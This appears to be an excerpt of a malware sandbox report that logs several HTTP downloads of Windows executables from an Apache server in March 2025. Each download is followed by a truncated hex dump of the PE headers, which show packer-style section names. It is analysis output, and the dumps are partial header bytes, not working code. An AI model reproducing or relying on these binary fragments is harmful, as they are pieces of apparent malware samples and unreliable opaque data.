00 00 00 00 00 00 00 00 00 00 40 00 00 e0 6a 6f 78 77 62 63 78 6a 00 10 00 00 00 20 4c 00 00 04 00 00 00 08 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 30 4c 00 00 22 00 00 00 0c 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 07 Mar 2025 18:52:10 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Fri, 07 Mar 2025 18:30:33 GMTETag: "dbc00-62fc4d164c275"Accept-Ranges: bytesContent-Length: 900096Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d5 1a 91 8b 91 7b ff d8 91 7b ff d8 91 7b ff d8 ca 13 fc d9 95 7b ff d8 ca 13 fb d9 9b 7b ff d8 ca 13 fa d9 17 7b ff d8 aa 25 fc d9 96 7b ff d8 aa 25 fa d9 8d 7b ff d8 aa 25 fb d9 83 7b ff d8 ca 13 fe d9 9c 7b ff d8 91 7b fe d8 eb 7b ff d8 03 25 f6 d9 95 7b ff d8 03 25 00 d8 90 7b ff d8 91 7b 68 d8 90 7b ff d8 03 25 fd d9 90 7b ff d8 52 69 63 68 91 7b ff d8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 64 86 07 00 be 12 cb 67 00 00 00 00 00 00 00 00 f0 00 22 00 0b 02 0e 00 00 fa 00 00 00 d0 0c 00 00 00 00 00 f8 5e 00 00 00 10 00 00 00 00 00 40 01 00 00 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 00 0e 00 00 04 00 00 00 00 00 00 02 00 60 81 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 cc 93 01 00 8c 00 00 00 00 e0 01 00 90 08 0c 00 00 c0 01 00 80 0d 00 00 00 00 00 00 00 00 00 00 00 f0 0d 00 0c 06 00 00 b0 84 01 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 84 01 00 94 00 00 00 00 00 00 00 00 00 00 00 00 10 01 00 80 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 40 f9 00 00 00 10 00 00 00 fa 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 c0 8f 00 00 00 10 01 00 00 90 00 00 00 fe 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 f0 1c 00 00 00 a0 01 00 00 0c 00 00 00 8e 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 70 64 61 74 61 00 00 80 0d 00 00 00 c0 01 00 00 0e 00 00 00 9a 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 67 66 69 64 73 00 00 a4 00 00 00 00 d0 01 00 00 02 00 00 00 a8 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 90 08 0c 00 00 e0 01 00 00 0a 0c 00 00 aa 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 06 00 00 00 f0 0d 00 00 08 00 00 00 b4 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 07 Mar 2025 18:52:16 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Fri, 07 Mar 2025 17:50:04 GMTETag: "316a00-62fc440a2f3b4"Accept-Ranges: bytesContent-Length: 3238400Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 eb dd c9 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 00 00 d2 04 00 00 b0 00 00 00 00 00 00 00 70 31 00 00 10 00 00 00 00 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 a0 31 00 00 04 00 00 e8 69 32 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 57 10 06 00 6b 00 00 00 00 00 06 00 fc 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 11 06 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 f0 05 00 00 10 00 00 00 f0 05 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 fc 02 00 00 00 00 06 00 00 02 00 00 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 10 06 00 00 02 00 00 00 02 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 77 70 64 68 6f 67 6c 76 00 40 2b 00 00 20 06 00 00 40 2b 00 00 04 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 73 78 70 6b 78 6c 6f 7a 00 10 00 00 00 60 31 00 00 04 00 00 00 44 31 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 70 31 00 00 22 00 00 00 48 31 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 07 Mar 2025 18:52:24 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Fri, 07 Mar 2025 17:50:32 GMTETag: "1aa800-62fc442468fff"Accept-Ranges: bytesContent-Length: 1746944Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 20 8b b6 d4 64 ea d8 87 64 ea d8 87 64 ea d8 87 0b 9c 73 87 7c ea d8 87 0b 9c 46 87 69 ea d8 87 0b 9c 72 87 5e ea d8 87 6d 92 5b 87 67 ea d8 87 6d 92 4b 87 62 ea d8 87 e4 93 d9 86 67 ea d8 87 64 ea d9 87 09 ea d8 87 0b 9c 77 87 77 ea d8 87 0b 9c 45 87 65 ea d8 87 52 69 63 68 64 ea d8 87 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 40 3d c2 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 96 02 00 00 2a 01 00 00 00 00 00 00 30 67 00 00 10 00 00 00 b0 02 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 60 67 00 00 04 00 00 30 60 1b 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 4d b0 24 00 61 00 00 00 00 a0 24 00 8c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 b1 24 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 90 24 00 00 10 00 00 00 68 01 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 8c 03 00 00 00 a0 24 00 00 04 00 00 00 78 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 b0 24 00 00 02 00 00 00 7c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 50 29 00 00 c0 24 00 00 02 00 00 00 7e 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 7a 77 76 74 74 62 6d 74 00 10 19 00 00 10 4e 00 00 02 19 00 00 80 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 71 72 69 6f 76 69 77 70 00 10 00 00 00 20 67 00 00 04 00 00 00 82 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 30 67 00 00 22 00 00 00 86 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 07 Mar 2025 18:52:31 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Fri, 07 Mar 2025 18:52:23 GMTETag: "ec600-62fc51f8008a3"Accept-Ranges: bytesContent-Length: 968192Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 9a c7 83 ae de a6 ed fd de a6 ed fd de a6 ed fd 6a 3a 1c fd fd a6 ed fd 6a 3a 1e fd 43 a6 ed fd 6a 3a 1f fd fd a6 ed fd 40 06 2a fd df a6 ed fd 8c ce e8 fc f3 a6 ed fd 8c ce e9 fc cc a6 ed fd 8c ce ee fc cb a6 ed fd d7 de 6e fd d7 a6 ed fd d7 de 7e fd fb a6 ed fd de a6 ec fd f7 a4 ed fd 7b cf e3 fc 8e a6 ed fd 7b cf ee fc df a6 ed fd 7b cf 12 fd df a6 ed fd de a6 7a fd df a6 ed fd 7b cf ef fc df a6 ed fd 52 69 63 68 de a6 ed fd 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 37 40 cb 67 00 00 00 00 00 00 00 00 e0 00 22 01 0b 01 0e 10 00 ac 09 00 00 16 05 00 00 00 00 00 77 05 02 00 00 10 00 00 00 c0 09 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 20 0f 00 00 04 00 00 7a cd 0e 00 02 00 40 80 00 00 40 00 00 10 00 00 00 00 40 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 64 8e 0c 00 7c 01 00 00 00 40 0d 00 98 5b 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 0e 00 94 75 00 00 f0 0f 0b 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 34 0c 00 18 00 00 00 10 10 0b 00 40 00 00 00 00 00 00 00 00 00 00 00 00 c0 09 00 94 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 1d ab 09 00 00 10 00 00 00 ac 09 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 82 fb 02 00 00 c0 09 00 00 fc 02 00 00 b0 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 6c 70 00 00 00 c0 0c 00 00 48 00 00 00 ac 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 98 5b 01 00 00 40 0d 00 00 5c 01 00 00 f4 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 94 75 00 00 00 a0 0e 00 00 76 00 00 00 50 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 07 Mar 2025 18:52:38 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Fri, 07 Mar 2025 17:49:36 GMTETag: "2a1c00-62fc43ef9e8cf"Accept-Ranges: bytesContent-Length: 2759680Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 7a 86 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 50 28 2c 65 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 24 00 00 00 08 00 00 00 00 00 00 00 80 2a 00 00 20 00 00 00 60 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 c0 2a 00 00 04 00 00 f1 a5 2a 00 02 00 60 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 55 80 00 00 69 00 00 00 00 60 00 00 64 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 81 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 40 00 00 00 20 00 00 00 12 00 00 00 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 64 05 00 00 00 60 00 00 00 04 00 00 00 32 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 20 00 00 00 80 00 00 00 02 00 00 00 36 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 61 77 74 78 76 77 6a 69 00 c0 29 00 00 a0 00 00 00 be 29 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 76 67 7a 6c 72 75 79 67 00 20 00 00 00 60 2a 00 00 04 00 00 00 f6 29 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 40 00 00 00 80 2a 00 00 22 00 00 00 fa 29 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 07 Mar 2025 18:52:46 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Fri, 07 Mar 2025 18:52:31 GMTETag: "1d2400-62fc51ff3d0da"Accept-Ranges: bytesContent-Length: 1909760Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d1 b6 42 53 95 d7 2c 00 95 d7 2c 00 95 d7 2c 00 81 bc 2f 01 98 d7 2c 00 81 bc 29 01 2f d7 2c 00 c7 a2 28 01 87 d7 2c 00 c7 a2 2f 01 83 d7 2c 00 c7 a2 29 01 cc d7 2c 00 a4 8b d1 00 97 d7 2c 00 81 bc 28 01 82 d7 2c 00 81 bc 2d 01 86 d7 2c 00 95 d7 2d 00 67 d7 2c 00 59 a2 25 01 94 d7 2c 00 59 a2 d3 00 94 d7 2c 00 59 a2 2e 01 94 d7 2c 00 52 69 63 68 95 d7 2c 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 23 01 bb 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 1d 00 f2 04 00 00 c0 01 00 00 00 00 00 00 10 4c 00 00 10 00 00 00 10 05 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 40 4c 00 00 04 00 00 6a 32 1d 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 57 e0 06 00 6b 00 00 00 00 d0 06 00 88 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 fa 4b 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a8 fa 4b 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 c0 06 00 00 10 00 00 00 d6 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 88 03 00 00 00 d0 06 00 00 04 00 00 00 e6 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 e0 06 00 00 02 00 00 00 ea 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 00 2b 00 00 f0 06 00 00 02 00 00 00 ec 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 62 6f 78 65 70 68 79 6c 00 10 1a 00 00 f0 31 00 00 10 1a 00 00 ee 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 74 6b 6f 75 63 72 70 6a 00 10 00 00 00 00 4c 00 00 04 00 00 00 fe 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 10 4c 00 00 22 00 00 00 02 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 07 Mar 2025 18:52:46 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Fri, 07 Mar 2025 18:52:17 GMTETag: "eaa00-62fc51f1d769d"Accept-Ranges: bytesContent-Length: 961024Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 9a c7 83 ae de a6 ed fd de a6 ed fd de a6 ed fd 6a 3a 1c fd fd a6 ed fd 6a 3a 1e fd 43 a6 ed fd 6a 3a 1f fd fd a6 ed fd 40 06 2a fd df a6 ed fd 8c ce e8 fc f3 a6 ed fd 8c ce e9 fc cc a6 ed fd 8c ce ee fc cb a6 ed fd d7 de 6e fd d7 a6 ed fd d7 de 7e fd fb a6 ed fd de a6 ec fd f7 a4 ed fd 7b cf e3 fc 8e a6 ed fd 7b cf ee fc df a6 ed fd 7b cf 12 fd df a6 ed fd de a6 7a fd df a6 ed fd 7b cf ef fc df a6 ed fd 52 69 63 68 de a6 ed fd 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 3e 40 cb 67 00 00 00 00 00 00 00 00 e0 00 22 01 0b 01 0e 10 00 ac 09 00 00 fa 04 00 00 00 00 00 77 05 02 00 00 10 00 00 00 c0 09 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 00 0f 00 00 04 00 00 19 ef 0e 00 02 00 40 80 00 00 40 00 00 10 00 00 00 00 40 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 64 8e 0c 00 7c 01 00 00 00 40 0d 00 44 3e 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 0e 00 94 75 00 00 f0 0f 0b 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 34 0c 00 18 00 00 00 10 10 0b 00 40 00 00 00 00 00 00 00 00 00 00 00 00 c0 09 00 94 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 1d ab 09 00 00 10 00 00 00 ac 09 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 82 fb 02 00 00 c0 09 00 00 fc 02 00 00 b0 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 6c 70 00 00 00 c0 0c 00 00 48 00 00 00 ac 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 44 3e 01 00 00 40 0d 00 00 40 01 00 00 f4 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 94 75 00 00 00 80 0e 00 00 76 00 00 00 34 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 